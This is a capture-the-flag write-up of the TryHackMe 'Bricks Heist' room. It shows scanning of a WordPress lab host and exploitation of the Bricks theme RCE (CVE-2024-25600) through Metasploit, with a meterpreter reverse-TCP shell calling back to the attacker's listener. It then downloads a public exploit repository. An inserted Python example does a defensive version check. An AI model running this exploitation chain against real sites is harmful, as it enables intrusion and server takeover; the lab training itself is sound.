TryHack3M: Bricks Heist
The following post by anthonyjsaab is licensed under
Link to room:
Machine version: Brick.By.Brick.v.2.1
This writeup walks you through a room on TryHackMe created by , , , and
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- 10.10.212.66
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-03 13:36 EEST
Nmap scan report for bricks.thm (10.10.212.66)
Host is up (0.13s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 482.02 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p22,80,443,3306 bricks.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-03 13:54 EEST
Nmap scan report for bricks.thm (10.10.212.66)
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3d:ca:7c:7d:3c:0e:8c:8c:0f:b0:f7:94:74:02:fa:ce (RSA)
| 256 0a:6f:7b:f1:94:df:5f:91:59:9e:d5:97:d0:55:29:54 (ECDSA)
|_ 256 a2:f2:7a:f1:12:42:c3:72:ec:3a:ed:9c:d9:11:30:46 (ED25519)
80/tcp open http WebSockify Python/3.8.10
|_http-title: Error response
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 405 Method Not Allowed
| Server: WebSockify Python/3.8.10
| Date: Fri, 03 May 2024 10:54:18 GMT
| Connection: close
| Content-Type: text/html;charset=utf-8
| Content-Length: 472
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 405</p>
| <p>Message: Method Not Allowed.</p>
| <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 501 Unsupported method ('OPTIONS')
| Server: WebSockify Python/3.8.10
| Date: Fri, 03 May 2024 10:54:18 GMT
| Connection: close
| Content-Type: text/html;charset=utf-8
| Content-Length: 500
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 501</p>
| <p>Message: Unsupported method ('OPTIONS').</p>
| <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
| </body>
|_ </html>
|_http-server-header: WebSockify Python/3.8.10
443/tcp open ssl/http Apache httpd
| tls-alpn:
| h2
|_ http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after: 2025-04-02T11:59:14
|_http-title: Brick by Brick
|_http-generator: WordPress 6.5
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache
3306/tcp open mysql MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=5/3%Time=6634C25D%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,291,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x
SF:20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\x202024\x
SF:2010:54:18\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/html
SF:;charset=utf-8\r\nContent-Length:\x20472\r\n\r\n<!DOCTYPE\x20HTML\x20PU
SF:BLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\
SF:x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Co
SF:ntent-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</head
SF:>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x2
SF:0response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x2040
SF:5</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Method\x20Not\x20
SF:Allowed\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20expl
SF:anation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x20
SF:this\x20resource\.</p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(HTTPOpti
SF:ons,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\n
SF:Server:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\
SF:x202024\x2010:54:18\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20
SF:text/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n<!DOCTYPE\x20H
SF:TML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n
SF:\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-e
SF:quiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\
SF:x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1
SF:>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20co
SF:de:\x20501</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Unsuppor
SF:ted\x20method\x20\('OPTIONS'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:p>Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x20
SF:Server\x20does\x20not\x20support\x20this\x20operation\.</p>\n\x20\x20\x
SF:20\x20</body>\n</html>\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.33 seconds
We can see that Apache is running on port 443 and that WordPress is installed on that server (port 80 only answers with a WebSockify error page).
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners -p22,80,443,3306 bricks.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-03 13:57 EEST
Nmap scan report for bricks.thm (10.10.212.66)
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2012-1577 7.5 https://vulners.com/cve/CVE-2012-1577
| PRION:CVE-2020-15778 6.8 https://vulners.com/prion/PRION:CVE-2020-15778
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| PRION:CVE-2020-12062 5.0 https://vulners.com/prion/PRION:CVE-2020-12062
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2010-4816 5.0 https://vulners.com/cve/CVE-2010-4816
| PRION:CVE-2021-28041 4.6 https://vulners.com/prion/PRION:CVE-2021-28041
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| PRION:CVE-2021-41617 4.4 https://vulners.com/prion/PRION:CVE-2021-41617
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| PRION:CVE-2020-14145 4.3 https://vulners.com/prion/PRION:CVE-2020-14145
| PRION:CVE-2016-20012 4.3 https://vulners.com/prion/PRION:CVE-2016-20012
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
| CVE-2023-51767 3.5 https://vulners.com/cve/CVE-2023-51767
| PRION:CVE-2021-36368 2.6 https://vulners.com/prion/PRION:CVE-2021-36368
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80/tcp open http WebSockify Python/3.8.10
|_http-server-header: WebSockify Python/3.8.10
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 405 Method Not Allowed
| Server: WebSockify Python/3.8.10
| Date: Fri, 03 May 2024 10:57:13 GMT
| Connection: close
| Content-Type: text/html;charset=utf-8
| Content-Length: 472
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 405</p>
| <p>Message: Method Not Allowed.</p>
| <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 501 Unsupported method ('OPTIONS')
| Server: WebSockify Python/3.8.10
| Date: Fri, 03 May 2024 10:57:14 GMT
| Connection: close
| Content-Type: text/html;charset=utf-8
| Content-Length: 500
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 501</p>
| <p>Message: Unsupported method ('OPTIONS').</p>
| <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
| </body>
|_ </html>
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
3306/tcp open mysql MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=5/3%Time=6634C30C%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,291,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x
SF:20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\x202024\x
SF:2010:57:13\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/html
SF:;charset=utf-8\r\nContent-Length:\x20472\r\n\r\n<!DOCTYPE\x20HTML\x20PU
SF:BLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\
SF:x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Co
SF:ntent-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</head
SF:>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x2
SF:0response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x2040
SF:5</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Method\x20Not\x20
SF:Allowed\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20expl
SF:anation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x20
SF:this\x20resource\.</p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(HTTPOpti
SF:ons,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\n
SF:Server:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\
SF:x202024\x2010:57:14\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20
SF:text/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n<!DOCTYPE\x20H
SF:TML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n
SF:\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-e
SF:quiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\
SF:x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1
SF:>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20co
SF:de:\x20501</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Unsuppor
SF:ted\x20method\x20\('OPTIONS'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:p>Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x20
SF:Server\x20does\x20not\x20support\x20this\x20operation\.</p>\n\x20\x20\x
SF:20\x20</body>\n</html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.77 seconds
Nothing interesting in the above output: the vulners matches are only generic OpenSSH 8.2p1 entries.
┌──(kali㉿kali)-[~]
└─$ wpscan --url https://bricks.thm --disable-tls-checks --api-token REDACTED_BY_ME
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: https://bricks.thm/ [10.10.212.66]
[+] Started: Fri May 3 14:12:10 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: server: Apache
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: https://bricks.thm/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: https://bricks.thm/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: https://bricks.thm/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: https://bricks.thm/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.5 identified (Insecure, released on 2024-04-02).
| Found By: Rss Generator (Passive Detection)
| - https://bricks.thm/feed/, <generator>https://wordpress.org/?v=6.5</generator>
| - https://bricks.thm/comments/feed/, <generator>https://wordpress.org/?v=6.5</generator>
|
| [!] 1 vulnerability identified:
|
| [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
| Fixed in: 6.5.2
| References:
| - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
| - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/
[+] WordPress theme in use: bricks
| Location: https://bricks.thm/wp-content/themes/bricks/
| Readme: https://bricks.thm/wp-content/themes/bricks/readme.txt
| Style URL: https://bricks.thm/wp-content/themes/bricks/style.css
| Style Name: Bricks
| Style URI: https://bricksbuilder.io/
| Description: Visual website builder for WordPress....
| Author: Bricks
| Author URI: https://bricksbuilder.io/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Bricks < 1.9.6.1 - Unauthenticated Remote Code Execution
| Fixed in: 1.9.6.1
| References:
| - https://wpscan.com/vulnerability/8bab5266-7154-4b65-b5bc-07a91b28be42
| - https://twitter.com/calvinalkan/status/1757441538164994099
| - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
|
| [!] Title: Bricks < 1.9.6.1 - Unauthenticated Remote Code Execution
| Fixed in: 1.9.6.1
| References:
| - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/b97b1c86-22a4-462b-9140-55139cf02c7a
|
| Version: 1.9.5 (80% confidence)
| Found By: Style (Passive Detection)
| - https://bricks.thm/wp-content/themes/bricks/style.css, Match: 'Version: 1.9.5'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:05 <====================> (137 / 137) 100.00% Time: 00:00:05
[i] No Config Backups Found.
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 23
[+] Finished: Fri May 3 14:12:22 2024
[+] Requests Done: 143
[+] Cached Requests: 38
[+] Data Sent: 35.385 KB
[+] Data Received: 57.585 KB
[+] Memory used: 255.609 MB
[+] Elapsed time: 00:00:12
This is very interesting: a very recent unauthenticated RCE vulnerability (CVE-2024-25600, Bricks < 1.9.6.1) has been detected on the target server.
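The wpscan finding above rests on two facts: the theme version is read from the "Version:" line of the theme's style.css, and that version is compared against the "Fixed in" versions in the vulnerability database. The following added example (written for this writeup, not wpscan's or the room authors' code) reproduces that inventory check in Python so a defender can run the same comparison against their own sites; the style.css header is a constructed sample that carries the version the scan reported, and the fixed-in versions are the ones listed in the scan output.

```python
"""Added example (not part of the original writeup): reproduce the
version check that wpscan performed on the Bricks theme, from the
theme's style.css header, against the 'Fixed in' versions reported."""
import re

# Constructed sample of a WordPress theme style.css header. The version
# string is the one the scan above reported for bricks.thm.
STYLE_CSS = """/*
Theme Name: Bricks
Theme URI: https://bricksbuilder.io/
Description: Visual website builder for WordPress....
Author: Bricks
Version: 1.9.5
*/
"""

# 'Fixed in' versions taken from the wpscan output on this page.
FIXED_IN = {
    "wordpress": "6.5.2",   # WP < 6.5.2 - Unauthenticated Stored XSS
    "bricks": "1.9.6.1",    # Bricks < 1.9.6.1 - Unauthenticated RCE (CVE-2024-25600)
}

# One 'Key: Value' line of the header comment block.
_HEADER_RE = re.compile(r"^\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.+?)\s*$", re.MULTILINE)


def parse_theme_header(style_css: str) -> dict:
    """Parse the 'Key: Value' lines of a theme's style.css comment block.
    Keys are lower-cased, so 'Theme Name' becomes 'theme name'."""
    header = {}
    for m in _HEADER_RE.finditer(style_css):
        header[m.group("key").strip().lower()] = m.group("value")
    return header


def version_tuple(v: str) -> tuple:
    """Turn '1.9.6.1' into (1, 9, 6, 1) so comparison is numeric, not lexical."""
    return tuple(int(p) for p in v.strip().split("."))


def is_below(installed: str, fixed: str) -> bool:
    """True when installed < fixed; shorter tuples are zero-padded so 1.9.6 == 1.9.6.0."""
    a, b = version_tuple(installed), version_tuple(fixed)
    n = max(len(a), len(b))
    a += (0,) * (n - len(a))
    b += (0,) * (n - len(b))
    return a < b


def affected_components(installed: dict) -> list:
    """Return the names of components whose installed version predates the fix."""
    return sorted(c for c, v in installed.items()
                  if c in FIXED_IN and is_below(v, FIXED_IN[c]))


def check_site(wp_version: str, style_css: str) -> list:
    """Combine the core version with the theme version parsed from style.css."""
    theme = parse_theme_header(style_css)
    installed = {"wordpress": wp_version}
    if theme.get("theme name", "").lower() == "bricks" and "version" in theme:
        installed["bricks"] = theme["version"]
    return affected_components(installed)


if __name__ == "__main__":
    # With the values from the scan above both components are reported.
    print(check_site("6.5", STYLE_CSS))
```

Fetching the real style.css is left to the reader (it is served at the Style URL the scan printed); the comparison deliberately pads version tuples so that a three-part version such as 1.9.6 is still ranked below the four-part fix 1.9.6.1, which a plain string comparison would get wrong.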
msf6 > search bricks
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/wp_bricks_builder_rce 2024-02-19 excellent Yes Unauthenticated RCE in Bricks Builder Theme
1 \_ target: Automatic . . . .
2 \_ target: PHP In-Memory . . . .
3 \_ target: Unix In-Memory . . . .
4 \_ target: Windows In-Memory . . . .
Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/wp_bricks_builder_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Windows In-Memory'
msf6 > use 1
[*] Additionally setting TARGET => Automatic
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_bricks_builder_rce) > show options
Module options (exploit/multi/http/wp_bricks_builder_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using
-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/wp_bricks_builder_rce) > set LHOST 10.11.85.12
LHOST => 10.11.85.12
msf6 exploit(multi/http/wp_bricks_builder_rce) > set RHOSTS bricks.thm
RHOST => bricks.thm
msf6 exploit(multi/http/wp_bricks_builder_rce) > set RPORT 443
RPORT => 443
msf6 exploit(multi/http/wp_bricks_builder_rce) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(multi/http/wp_bricks_builder_rce) > run
[*] Started reverse TCP handler on 10.11.85.12:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. WordPress does not appear to be online. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_bricks_builder_rce) > set RHOSTS 10.10.239.202
RHOSTS => 10.10.239.202
msf6 exploit(multi/http/wp_bricks_builder_rce) > run
[*] Started reverse TCP handler on 10.11.85.12:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.5
[+] Detected Bricks Builder theme version: 1.9.5
[+] The target appears to be vulnerable.
[+] Nonce retrieved: 964a6e9b87
[*] Sending stage (39927 bytes) to 10.10.239.202
[*] Meterpreter session 1 opened (10.11.85.12:4444 -> 10.10.239.202:46644) at 2024-05-04 09:18:09 +0300
meterpreter >
meterpreter > ls
Listing: /data/www/default
==========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 523 fil 2024-04-02 14:13:36 +0300 .htaccess
100644/rw-r--r-- 43 fil 2024-04-05 15:39:01 +0300 FLAG_REDACTED.txt
100644/rw-r--r-- 405 fil 2024-04-02 14:12:03 +0300 index.php
040755/rwxr-xr-x 4096 dir 2023-04-12 03:53:55 +0300 kod
100644/rw-r--r-- 19915 fil 2024-04-04 18:15:40 +0300 license.txt
040755/rwxr-xr-x 4096 dir 2024-04-02 14:03:35 +0300 phpmyadmin
100644/rw-r--r-- 7401 fil 2024-04-04 18:15:40 +0300 readme.html
100644/rw-r--r-- 7387 fil 2024-04-04 18:15:40 +0300 wp-activate.php
040755/rwxr-xr-x 4096 dir 2024-04-02 14:12:03 +0300 wp-admin
100644/rw-r--r-- 351 fil 2024-04-02 14:12:03 +0300 wp-blog-header.php
100644/rw-r--r-- 2323 fil 2024-04-02 14:12:03 +0300 wp-comments-post.php
100644/rw-r--r-- 3012 fil 2024-04-04 18:15:40 +0300 wp-config-sample.php
100666/rw-rw-rw- 3288 fil 2024-04-02 14:12:39 +0300 wp-config.php
040755/rwxr-xr-x 4096 dir 2024-05-04 09:19:23 +0300 wp-content
100644/rw-r--r-- 5638 fil 2024-04-02 14:12:03 +0300 wp-cron.php
040755/rwxr-xr-x 16384 dir 2024-04-04 18:15:40 +0300 wp-includes
100644/rw-r--r-- 2502 fil 2024-04-02 14:12:03 +0300 wp-links-opml.php
100644/rw-r--r-- 3927 fil 2024-04-02 14:12:03 +0300 wp-load.php
100644/rw-r--r-- 50917 fil 2024-04-04 18:15:40 +0300 wp-login.php
100644/rw-r--r-- 8525 fil 2024-04-02 14:12:03 +0300 wp-mail.php
100644/rw-r--r-- 28427 fil 2024-04-04 18:15:40 +0300 wp-settings.php
100644/rw-r--r-- 34385 fil 2024-04-02 14:12:03 +0300 wp-signup.php
100644/rw-r--r-- 4885 fil 2024-04-02 14:12:03 +0300 wp-trackback.php
100644/rw-r--r-- 3246 fil 2024-04-04 18:15:40 +0300 xmlrpc.php
Something very annoying is happening: every time I try to spawn a shell using meterpreter, or try to execute any command on the target machine, the meterpreter session dies.
msf6 exploit(multi/http/wp_bricks_builder_rce) > run
[*] Started reverse TCP handler on 10.11.85.12:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.5
[+] Detected Bricks Builder theme version: 1.9.5
[+] The target appears to be vulnerable.
[+] Nonce retrieved: 964a6e9b87
[*] Sending stage (39927 bytes) to 10.10.239.202
[*] Meterpreter session 5 opened (10.11.85.12:4444 -> 10.10.239.202:35094) at 2024-05-04 09:50:22 +0300
meterpreter > shell
[*] 10.10.239.202 - Meterpreter session 5 closed. Reason: Died
That is why I chose to go with another exploit implementation:
┌──(kali㉿kali)-[~]
└─$ wget https://github.com/Chocapikk/CVE-2024-25600/archive/refs/heads/main.zip
--2024-05-04 10:23:54-- https://github.com/Chocapikk/CVE-2024-25600/archive/refs/heads/main.zip
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/Chocapikk/CVE-2024-25600/zip/refs/heads/main [following]
--2024-05-04 10:23:55-- https://codeload.github.com/Chocapikk/CVE-2024-25600/zip/refs/heads/main
Resolving codeload.github.com (codeload.github.com)... 140.82.121.10
Connecting to codeload.github.com (codeload.github.com)|140.82.121.10|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: ‘main.zip’
main.zip [ <=> ] 5.28K --.-KB/s in 0.1s
2024-05-04 10:23:59 (50.4 KB/s) - ‘main.zip’ saved [5411]
┌──(kali㉿kali)-[~]
└─$ unzip main.zip
Archive: main.zip
19e80ce8c448bccc2fcca161ebf76db569a14b19
creating: CVE-2024-25600-main/
inflating: CVE-2024-25600-main/README.md
inflating: CVE-2024-25600-main/exploit.py
extracting: CVE-2024-25600-main/requirements.txt
┌──(kali㉿kali)-[~]
└─$ cd CVE-2024-25600-main/
┌──(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ python -m venv venv
┌──(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ source venv/bin/activate
┌──(venv)─(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ pip install -r requirements.txt
Collecting alive_progress (from -r requirements.txt (line 1))
Downloading alive_progress-3.1.5-py3-none-any.whl.metadata (68 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 68.4/68.4 kB 136.8 kB/s eta 0:00:00
Collecting bs4 (from -r requirements.txt (line 2))
Downloading bs4-0.0.2-py2.py3-none-any.whl.metadata (411 bytes)
Collecting prompt_toolkit (from -r requirements.txt (line 3))
Downloading prompt_toolkit-3.0.43-py3-none-any.whl.metadata (6.5 kB)
Collecting requests (from -r requirements.txt (line 4))
Downloading requests-2.31.0-py3-none-any.whl.metadata (4.6 kB)
Collecting rich (from -r requirements.txt (line 5))
Downloading rich-13.7.1-py3-none-any.whl.metadata (18 kB)
